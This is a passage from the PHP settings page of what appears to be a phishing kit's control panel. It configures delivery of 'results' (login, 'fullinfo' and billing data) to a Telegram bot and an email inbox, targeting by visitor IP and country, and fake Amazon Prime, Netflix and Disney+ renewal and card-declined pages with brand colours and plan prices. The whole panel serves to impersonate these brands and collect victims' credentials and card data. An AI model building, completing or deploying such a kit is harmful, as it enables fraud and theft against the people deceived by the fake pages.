                <div style="margin-top: 12px; padding: 12px; background: rgba(255,255,255,0.05); border-radius: 8px; border: 1px solid rgba(255,255,255,0.1);">
                    <p style="color: var(--text-dim); font-size: 0.75rem; margin: 0;">
                        <i class="bi bi-info-circle"></i> Template <b><?= htmlspecialchars($activeTemplateName) ?></b> menggunakan declined text bawaan.
                        Untuk mengubah design declined, edit langsung di file template.
                    </p>
                </div>
            </div>
        </div>
        <?php endif; ?>
        
        <!-- LANGUAGE SETTINGS -->
        <div class="settings-card language">
            <div class="settings-card-header">
                <i class="bi bi-globe icon"></i>
                <span class="title">LANGUAGE SETTINGS</span>
                <span class="badge">→ GEN.JSON (GLOBAL)</span>
            </div>
            <div class="settings-card-body">
                <div class="form-row cols-3">
                    <div class="form-group">
                        <label class="form-label">AUTO-DETECT BY IP</label>
                        <select name="auto_detect_lang" class="form-select">
                            <option value="on" <?= ($genConfig['auto_detect_lang'] ?? 'on') === 'on' ? 'selected' : '' ?>>ON</option>
                            <option value="off" <?= ($genConfig['auto_detect_lang'] ?? '') === 'off' ? 'selected' : '' ?>>OFF</option>
                        </select>
                    </div>
                    <div class="form-group">
                        <label class="form-label">FALLBACK LANGUAGE</label>
                        <select name="fallback_lang" class="form-select">
                            <option value="en" <?= ($genConfig['fallback_lang'] ?? 'en') === 'en' ? 'selected' : '' ?>>English</option>
                            <option value="es" <?= ($genConfig['fallback_lang'] ?? '') === 'es' ? 'selected' : '' ?>>Spanish</option>
                            <option value="fr" <?= ($genConfig['fallback_lang'] ?? '') === 'fr' ? 'selected' : '' ?>>French</option>
                            <option value="de" <?= ($genConfig['fallback_lang'] ?? '') === 'de' ? 'selected' : '' ?>>German</option>
                            <option value="it" <?= ($genConfig['fallback_lang'] ?? '') === 'it' ? 'selected' : '' ?>>Italian</option>
                            <option value="pt" <?= ($genConfig['fallback_lang'] ?? '') === 'pt' ? 'selected' : '' ?>>Portuguese</option>
                        </select>
                    </div>
                    <div class="form-group">
                        <label class="form-label">SUPPORTED COUNTRIES (0)</label>
                        <input type="text" name="supported_countries" class="form-input" value="<?= htmlspecialchars($genConfig['supported_countries'] ?? '') ?>" placeholder="US,GB,CA,AU...">
                        <span class="form-hint">Comma separated country codes</span>
                    </div>
                </div>
            </div>
        </div>
        
        <div class="two-col">
            <!-- TELEGRAM -->
            <div class="settings-card telegram">
                <div class="settings-card-header">
                    <i class="bi bi-telegram icon"></i>
                    <span class="title">TELEGRAM</span>
                    <span class="badge">→ GEN.JSON</span>
                </div>
                <div class="settings-card-body">
                    <div class="form-row cols-2" style="margin-bottom: 15px;">
                        <div class="form-group">
                            <label class="form-label">STATUS</label>
                            <select name="telegram_status" class="form-select">
                                <option value="on" <?= ($genConfig['telegram'] ?? '') === 'on' ? 'selected' : '' ?>>Enabled</option>
                                <option value="off" <?= ($genConfig['telegram'] ?? 'off') === 'off' ? 'selected' : '' ?>>Disabled</option>
                            </select>
                        </div>
                        <div class="form-group">
                            <label class="form-label">CHAT ID</label>
                            <input type="text" name="telegram_chatid" class="form-input" value="<?= htmlspecialchars($genConfig['telegram_chatid'] ?? '') ?>" placeholder="123456789">
                        </div>
                    </div>
                    <div class="form-group">
                        <label class="form-label">BOT TOKEN</label>
                        <input type="text" name="telegram_token" class="form-input" value="<?= htmlspecialchars($genConfig['telegram_token'] ?? '') ?>" placeholder="123456:ABC-DEF...">
                    </div>
                    <div class="test-section">
                        <span class="test-label"><i class="bi bi-lightning-fill"></i> TEST</span>
                        <button type="submit" name="test_telegram" class="btn btn-test"><i class="bi bi-send"></i> Send Test</button>
                        <?php if ($testResult === 'telegram_success'): ?><span style="color: var(--accent-green);">✓ Sent!</span><?php endif; ?>
                    </div>
                </div>
            </div>
            
            <!-- EMAIL -->
            <div class="settings-card email">
                <div class="settings-card-header">
                    <i class="bi bi-envelope-fill icon"></i>
                    <span class="title">EMAIL RESULT</span>
                    <span class="badge">→ GEN.JSON</span>
                </div>
                <div class="settings-card-body">
                    <div class="form-row cols-2" style="margin-bottom: 15px;">
                        <div class="form-group">
                            <label class="form-label">STATUS</label>
                            <select name="email_status" class="form-select">
                                <option value="on" <?= ($genConfig['email_send_status'] ?? '') === 'on' ? 'selected' : '' ?>>Enabled</option>
                                <option value="off" <?= ($genConfig['email_send_status'] ?? 'off') === 'off' ? 'selected' : '' ?>>Disabled</option>
                            </select>
                        </div>
                        <div class="form-group">
                            <label class="form-label">EMAIL PENERIMA</label>
                            <input type="email" name="email_result" class="form-input" value="<?= htmlspecialchars($genConfig['email_result'] ?? '') ?>" placeholder="result@example.com">
                        </div>
                    </div>
                    <div class="form-row cols-2">
                        <div class="form-group">
                            <label class="form-label">FROM EMAIL</label>
                            <input type="email" name="email_from" class="form-input" value="<?= htmlspecialchars($genConfig['email_from'] ?? '') ?>" placeholder="noreply@example.com">
                        </div>
                        <div class="form-group">
                            <label class="form-label">FROM NAME</label>
                            <input type="text" name="email_from_name" class="form-input" value="<?= htmlspecialchars($genConfig['email_from_name'] ?? '') ?>" placeholder="Result Bot">
                        </div>
                    </div>
                    <div class="form-group" style="margin-top: 20px; padding-top: 20px; border-top: 1px solid var(--border);">
                        <label class="form-label"><i class="bi bi-star-fill" style="color: var(--accent-yellow);"></i> BRAND NAME (Email Template)</label>
                        <input type="text" name="brand_name" class="form-input" value="<?= htmlspecialchars($genConfig['brand_name'] ?? '405 X Gobot.su') ?>" placeholder="405 X Gobot.su">
                        <small style="color: var(--text-dim); font-size: 0.8rem; margin-top: 6px; display: block;">Nama ini muncul di header email (Login, Fullinfo, Billing). Bisa diganti bebas.</small>
                    </div>
                </div>
            </div>
        </div>
        
        <!-- RENEWAL TEMPLATES SETTINGS -->
        <?php if (in_array($activeTemplate, ['etmin', 'netflix', 'disney'])): ?>
        <div class="settings-card" style="border-color: rgba(0, 255, 157, 0.2);">
            <div class="settings-card-header" style="background: rgba(0, 255, 157, 0.05);">
                <i class="bi bi-collection-play-fill icon" style="color: #00ff9d;"></i>
                <span class="title" style="color: #00ff9d;">RENEWAL TEMPLATES - <?= htmlspecialchars($activeTemplateName) ?></span>
                <span class="badge" style="background: rgba(0, 255, 157, 0.1); color: #00ff9d; border-color: rgba(0, 255, 157, 0.3);">PLAN PAGES</span>
            </div>
            <div class="settings-card-body">
                
                <?php if ($activeTemplate === 'etmin'): ?>
                <!-- Amazon Prime -->
                <div style="background: rgba(255, 153, 0, 0.05); border: 1px solid rgba(255, 153, 0, 0.2); border-radius: 8px; padding: 16px; margin-bottom: 16px;">
                    <div style="display: flex; align-items: center; justify-content: space-between; margin-bottom: 12px;">
                        <span style="font-weight: 600; color: #ff9900;">🎬 Amazon Prime</span>
                        <select name="renewal_amazon_enabled" class="form-select" style="width: 80px;">
                            <option value="on" <?= ($genConfig['renewal_amazon_enabled'] ?? 'off') === 'on' ? 'selected' : '' ?>>ON</option>
                            <option value="off" <?= ($genConfig['renewal_amazon_enabled'] ?? 'off') === 'off' ? 'selected' : '' ?>>OFF</option>
                        </select>
                    </div>
                    <div class="form-row cols-2" style="margin-bottom: 12px;">
                        <div class="form-group">
                            <label>Monthly Price ($)</label>
                            <input type="text" name="renewal_amazon_monthly" value="<?= htmlspecialchars($genConfig['renewal_amazon_monthly'] ?? '14.99') ?>" class="form-control">
                        </div>
                        <div class="form-group">
                            <label>Yearly Price ($)</label>
                            <input type="text" name="renewal_amazon_yearly" value="<?= htmlspecialchars($genConfig['renewal_amazon_yearly'] ?? '139.00') ?>" class="form-control">
                        </div>
                    </div>
                    <div style="font-size: 11px; color: #ff9900; margin-bottom: 8px;">📝 Customizable Text</div>
                    <div class="form-row cols-2" style="margin-bottom: 8px;">
                        <div class="form-group">
                            <label>Success Title</label>
                            <input type="text" name="renewal_success_title" value="<?= htmlspecialchars($genConfig['renewal_success_title'] ?? 'Verification Successful!') ?>" class="form-control">
                        </div>
                        <div class="form-group">
                            <label>Page Title</label>
                            <input type="text" name="renewal_page_title" value="<?= htmlspecialchars($genConfig['renewal_page_title'] ?? 'Choose Your Plan') ?>" class="form-control">
                        </div>
                    </div>
                    <div class="form-group" style="margin-bottom: 8px;">
                        <label>Success Text</label>
                        <input type="text" name="renewal_success_text" value="<?= htmlspecialchars($genConfig['renewal_success_text'] ?? 'Your identity has been verified. Please select your Prime membership plan to continue.') ?>" class="form-control">
                    </div>
                    <div class="form-group">
                        <label>Page Subtitle</label>
                        <input type="text" name="renewal_page_subtitle" value="<?= htmlspecialchars($genConfig['renewal_page_subtitle'] ?? 'Select a membership that works for you') ?>" class="form-control">
                    </div>
                </div>
                <?php endif; ?>
                
                <?php if ($activeTemplate === 'netflix'): ?>
                <!-- Netflix -->
                <div style="background: rgba(229, 9, 20, 0.05); border: 1px solid rgba(229, 9, 20, 0.2); border-radius: 8px; padding: 16px; margin-bottom: 16px;">
                    <div style="display: flex; align-items: center; justify-content: space-between; margin-bottom: 12px;">
                        <span style="font-weight: 600; color: #e50914;">📺 Netflix</span>
                        <select name="renewal_netflix_enabled" class="form-select" style="width: 80px;">
                            <option value="on" <?= ($genConfig['renewal_netflix_enabled'] ?? 'off') === 'on' ? 'selected' : '' ?>>ON</option>
                            <option value="off" <?= ($genConfig['renewal_netflix_enabled'] ?? 'off') === 'off' ? 'selected' : '' ?>>OFF</option>
                        </select>
                    </div>
                    <div class="form-row cols-2">
                        <div class="form-group">
                            <label>Standard Price ($)</label>
                            <input type="text" name="renewal_netflix_standard" value="<?= htmlspecialchars($genConfig['renewal_netflix_standard'] ?? '15.49') ?>" class="form-control">
                        </div>
                        <div class="form-group">
                            <label>Premium Price ($)</label>
                            <input type="text" name="renewal_netflix_premium" value="<?= htmlspecialchars($genConfig['renewal_netflix_premium'] ?? '22.99') ?>" class="form-control">
                        </div>
                    </div>
                </div>
                <?php endif; ?>
                
                <?php if ($activeTemplate === 'disney'): ?>
                <!-- Disney+ -->
                <div style="background: rgba(0, 99, 229, 0.05); border: 1px solid rgba(0, 99, 229, 0.2); border-radius: 8px; padding: 16px;">
                    <div style="display: flex; align-items: center; justify-content: space-between; margin-bottom: 12px;">
                        <span style="font-weight: 600; color: #0063e5;">✨ Disney+</span>
                        <select name="renewal_disney_enabled" class="form-select" style="width: 80px;">
                            <option value="on" <?= ($genConfig['renewal_disney_enabled'] ?? 'off') === 'on' ? 'selected' : '' ?>>ON</option>
                            <option value="off" <?= ($genConfig['renewal_disney_enabled'] ?? 'off') === 'off' ? 'selected' : '' ?>>OFF</option>
                        </select>
                    </div>
                    
                    <!-- Promo Settings -->
                    <div class="form-row cols-2" style="margin-bottom: 12px;">
                        <div class="form-group">
                            <label>Promo Badge</label>
                            <select name="renewal_disney_promo" class="form-select">
                                <option value="on" <?= ($genConfig['renewal_disney_promo'] ?? 'on') === 'on' ? 'selected' : '' ?>>ON</option>
                                <option value="off" <?= ($genConfig['renewal_disney_promo'] ?? 'on') === 'off' ? 'selected' : '' ?>>OFF</option>
                            </select>
                        </div>
                        <div class="form-group">
                            <label>Promo Text</label>
                            <input type="text" name="renewal_disney_promo_text" value="<?= htmlspecialchars($genConfig['renewal_disney_promo_text'] ?? 'LIMITED TIME OFFER - SAVE 16%') ?>" class="form-control">
                        </div>
                    </div>
                    
                    <!-- Disney+ Standalone -->
                    <div style="font-size: 12px; color: #888; margin-bottom: 8px;">Disney+ Standalone (Yearly)</div>
                    <div class="form-row cols-2" style="margin-bottom: 12px;">
                        <div class="form-group">
                            <label>Basic ($)</label>
                            <input type="text" name="renewal_disney_basic_yearly" value="<?= htmlspecialchars($genConfig['renewal_disney_basic_yearly'] ?? '79.99') ?>" class="form-control">
                        </div>
                        <div class="form-group">
                            <label>Premium ($)</label>
                            <input type="text" name="renewal_disney_premium_yearly" value="<?= htmlspecialchars($genConfig['renewal_disney_premium_yearly'] ?? '139.99') ?>" class="form-control">
                        </div>
                    </div>
                    
                    <!-- Disney Bundle -->
                    <div style="font-size: 12px; color: #888; margin-bottom: 8px;">Disney Bundle (Yearly)</div>
                    <div class="form-row cols-3">
                        <div class="form-group">
                            <label>Duo Basic ($)</label>
                            <input type="text" name="renewal_disney_duo_yearly" value="<?= htmlspecialchars($genConfig['renewal_disney_duo_yearly'] ?? '99.99') ?>" class="form-control">
                        </div>
                        <div class="form-group">
                            <label>Trio Basic ($)</label>
                            <input type="text" name="renewal_disney_trio_basic_yearly" value="<?= htmlspecialchars($genConfig['renewal_disney_trio_basic_yearly'] ?? '149.99') ?>" class="form-control">
                        </div>
                        <div class="form-group">
                            <label>Trio Premium ($)</label>
                            <input type="text" name="renewal_disney_trio_premium_yearly" value="<?= htmlspecialchars($genConfig['renewal_disney_trio_premium_yearly'] ?? '249.99') ?>" class="form-control">
                        </div>
                    </div>
                </div>
                <?php endif; ?>
                
            </div>
        </div>
        <?php endif; ?>
        
        <!-- Save Button -->
        <div class="save-container">
            <div class="save-info">
                <i class="bi bi-info-circle"></i>
                Settings untuk <b><?= htmlspecialchars($activeTemplateName) ?></b> disimpan ke gen.json & auto-sync ke control.json
            </div>
            <button type="submit" name="save_settings" class="btn btn-primary">
                <i class="bi bi-check-lg"></i> Save All Settings
            </button>
        </div>
    </form>
</div>

<script>
(function() {
    'use strict';
    
    // ==========================================
    // NETFLIX COLOR FUNCTIONS
    // ==========================================
    
    // Toggle color picker visibility (Netflix)
    window.toggleColorPicker = function() {
        var mode = document.getElementById('declinedColorMode');
        var section = document.getElementById('customColorSection');
        if (mode && section) {
            section.style.display = mode.value === 'custom' ? 'block' : 'none';
        }
    };
    
    // Netflix Color Presets
    window.setNetflixPreset = function(preset) {
        var presets = {
            netflix: { bg: '#fff4f4', error: '#e50914', title: '#221f1f', sub: '#333333', border: '#fcd9d9', iconBg: '#e50914', link: '#0073e6' },
            dark: { bg: '#1a1a1a', error: '#e50914', title: '#ffffff', sub: '#b3b3b3', border: '#333333', iconBg: '#e50914', link: '#4dabf7' },
            light: { bg: '#ffffff', error: '#dc3545', title: '#212529', sub: '#6c757d', border: '#dee2e6', iconBg: '#dc3545', link: '#0d6efd' },
            disney: { bg: '#1a1d29', error: '#f9423a', title: '#f9f9f9', sub: '#cacaca', border: '#2a2f3d', iconBg: '#f9423a', link: '#0063e5' }
        };
        var p = presets[preset];
        if (!p) return;
        var fields = {bg: 'Bg', error: 'Error', title: 'Title', sub: 'Sub', border: 'Border', iconBg: 'IconBg', link: 'Link'};
        for (var key in fields) {
            var el = document.getElementById('netflixColor' + fields[key]);
            if (el) {
                el.value = p[key];
                var inputName = key === 'iconBg' ? 'icon_bg' : key;
                var textEl = document.querySelector('input[name="netflix_color_' + inputName + '_text"]');
                if (textEl) textEl.value = p[key];
            }
        }
        updateNetflixPreview();
    };
    
    // Update Netflix Live Preview
    function updateNetflixPreview() {
        var previewBox = document.getElementById('netflixPreviewBox');
        var previewIcon = document.getElementById('netflixPreviewIcon');
        var previewTitle = document.getElementById('netflixPreviewTitle');
        var previewSub = document.getElementById('netflixPreviewSub');
        var previewLink = document.getElementById('netflixPreviewLink');
        if (!previewBox) return;
        
        var bgEl = document.getElementById('netflixColorBg');
        var errorEl = document.getElementById('netflixColorError');
        var titleEl = document.getElementById('netflixColorTitle');
        var subEl = document.getElementById('netflixColorSub');
        var borderEl = document.getElementById('netflixColorBorder');
        var iconBgEl = document.getElementById('netflixColorIconBg');
        var linkEl = document.getElementById('netflixColorLink');
        
        previewBox.style.background = bgEl ? bgEl.value : '#fff4f4';
        previewBox.style.borderColor = borderEl ? borderEl.value : '#fcd9d9';
        if (previewIcon) previewIcon.style.background = iconBgEl ? iconBgEl.value : '#e50914';
        if (previewTitle) previewTitle.style.color = titleEl ? titleEl.value : '#221f1f';
        if (previewSub) previewSub.style.color = subEl ? subEl.value : '#333333';
        if (previewLink) previewLink.style.color = linkEl ? linkEl.value : '#0073e6';
    }
    window.updateNetflixPreview = updateNetflixPreview;
    
    // Legacy
    window.setPresetColor = function(bg, text) {
        var bgEl = document.getElementById('netflixColorBg');
        var errorEl = document.getElementById('netflixColorError');
        if (bgEl) bgEl.value = bg;
        if (errorEl) errorEl.value = text;
        updateNetflixPreview();
    };
    window.syncColorInput = function() {};
    window.syncColorPicker = function() {};

    // ==========================================
    // DISNEY+ COLOR FUNCTIONS
    // ==========================================
    
    var disneyDefaults = {
        bg: '#1a1d29', error: '#f9423a', title: '#f9f9f9', sub: '#cacaca', muted: '#a0a0a0', cta: '#cacaca', inner: '#0e1524'
    };
    
    var disneyMessages = {
        'couldnt_process': "We couldn't process your payment",
        'payment_declined': 'Your payment was declined',
        'payment_unsuccessful': 'Payment unsuccessful',
        'card_declined': 'Your card was declined'
    };
    
    // Apply colors to Disney+ preview box
    function applyDisneyColors(c) {
        var box = document.getElementById('disneyPreviewBox');
        var titleEl = document.getElementById('disneyPreviewTitle');
        var subEl = document.getElementById('disneyPreviewSub');
        var ctaEl = document.getElementById('disneyPreviewCta');
        
        if (box) box.style.background = c.bg || '#1a1d29';
        if (titleEl) titleEl.style.color = c.title || '#f9f9f9';
        if (subEl) subEl.style.color = c.sub || '#cacaca';
        if (ctaEl) ctaEl.style.color = c.cta || '#cacaca';
        
        // Update SVG icon stroke color
        if (box) {
            var svgPaths = box.querySelectorAll('svg circle, svg path');
            for (var i = 0; i < svgPaths.length; i++) {
                svgPaths[i].setAttribute('stroke', c.error || '#f9423a');
            }
        }
    }
    
    // Toggle Disney+ Color Settings + update preview
    window.toggleDisneyColorSettings = function() {
        var modeEl = document.getElementById('disneyColorMode');
        var colorSettings = document.getElementById('disneyColorSettings');
        var mode = modeEl ? modeEl.value : 'default';
        
        if (colorSettings) {
            colorSettings.style.display = mode === 'custom' ? 'block' : 'none';
        }
        if (mode === 'default') {
            applyDisneyColors(disneyDefaults);
        } else {
            readAndApplyDisneyCustomColors();
        }
    };
    
    // Read custom colors from inputs and apply to preview
    function readAndApplyDisneyCustomColors() {
        var colors = {};
        var fields = ['bg', 'error', 'title', 'sub', 'cta'];
        var defaults = { bg: '#1a1d29', error: '#f9423a', title: '#f9f9f9', sub: '#cacaca', cta: '#cacaca' };
        for (var i = 0; i < fields.length; i++) {
            var f = fields[i];
            var id = 'disneyColor' + f.charAt(0).toUpperCase() + f.slice(1);
            var el = document.getElementById(id);
            colors[f] = el ? el.value : defaults[f];
        }
        applyDisneyColors(colors);
    }
    
    // Update Disney+ preview (auto-detect mode)
    function updateDisneyPreview() {
        var modeEl = document.getElementById('disneyColorMode');
        if (!modeEl) return;
        if (modeEl.value === 'default') {
            applyDisneyColors(disneyDefaults);
        } else {
            readAndApplyDisneyCustomColors();
        }
    }
    window.updateDisneyPreview = updateDisneyPreview;
    
    // Update Disney+ error message text in preview
    function updateDisneyErrorMessage() {
        var msgSelect = document.querySelector('select[name="disney_error_message"]');
        var titleEl = document.getElementById('disneyPreviewTitle');
        if (msgSelect && titleEl) {
            var key = msgSelect.value || 'couldnt_process';
            titleEl.textContent = disneyMessages[key] || disneyMessages['couldnt_process'];
        }
    }
    window.updateDisneyErrorMessage = updateDisneyErrorMessage;
    
    // Disney+ Color Presets
    window.setDisneyPreset = function(preset) {
        var presets = {
            disney: { bg: '#1a1d29', error: '#f9423a', title: '#f9f9f9', sub: '#cacaca', muted: '#a0a0a0', cta: '#cacaca', inner: '#0e1524' },
            dark: { bg: '#1a1a1a', error: '#ff4444', title: '#ffffff', sub: '#cccccc', muted: '#999999', cta: '#cccccc', inner: '#2d2d2d' },
            light: { bg: '#ffffff', error: '#dc3545', title: '#212529', sub: '#6c757d', muted: '#adb5bd', cta: '#6c757d', inner: '#f8f9fa' },
            netflix: { bg: '#141414', error: '#e50914', title: '#ffffff', sub: '#b3b3b3', muted: '#8c8c8c', cta: '#b3b3b3', inner: '#2a2a2a' }
        };
        var p = presets[preset];
        if (!p) return;
        
        var fields = ['bg', 'error', 'title', 'sub', 'muted', 'cta', 'inner'];
        for (var i = 0; i < fields.length; i++) {
            var f = fields[i];
            var id = 'disneyColor' + f.charAt(0).toUpperCase() + f.slice(1);
            var el = document.getElementById(id);
            if (el) {
                el.value = p[f];
                var textEl = document.querySelector('input[name="disney_color_' + f + '_text"]');
                if (textEl) textEl.value = p[f];
            }
        }
        applyDisneyColors(p);
    };

    // ==========================================
    // INITIALIZATION - runs immediately
    // ==========================================
    function initSettings() {
        // Netflix: attach color input listeners
        var netflixInputs = document.querySelectorAll('input[name^="netflix_color_"]');
        for (var i = 0; i < netflixInputs.length; i++) {
            netflixInputs[i].addEventListener('input', updateNetflixPreview);
            netflixInputs[i].addEventListener('change', updateNetflixPreview);
        }
        if (netflixInputs.length > 0) {
            updateNetflixPreview();
        }
        
        // Disney: attach color input listeners
        var disneyInputs = document.querySelectorAll('input[name^="disney_color_"]');
        for (var j = 0; j < disneyInputs.length; j++) {
            disneyInputs[j].addEventListener('input', updateDisneyPreview);
            disneyInputs[j].addEventListener('change', updateDisneyPreview);
        }
        
        // Disney: attach error message listener
        var errorMsgSelect = document.querySelector('select[name="disney_error_message"]');
        if (errorMsgSelect) {
            errorMsgSelect.addEventListener('change', updateDisneyErrorMessage);
        }
        
        // Disney: initialize preview
        var disneyBox = document.getElementById('disneyPreviewBox');
        if (disneyBox) {
            updateDisneyPreview();
            updateDisneyErrorMessage();
        }
    }
    
    // Run init immediately (DOM elements above this script are already parsed)
    try {
        initSettings();
    } catch(e) {
        // Fallback: try again when DOM is fully loaded
        document.addEventListener('DOMContentLoaded', function() {
            try { initSettings(); } catch(e2) { console.error('Settings init error:', e2); }
        });
    }
    
})();
</script>

<?php include 'include/footer.php'; ?>
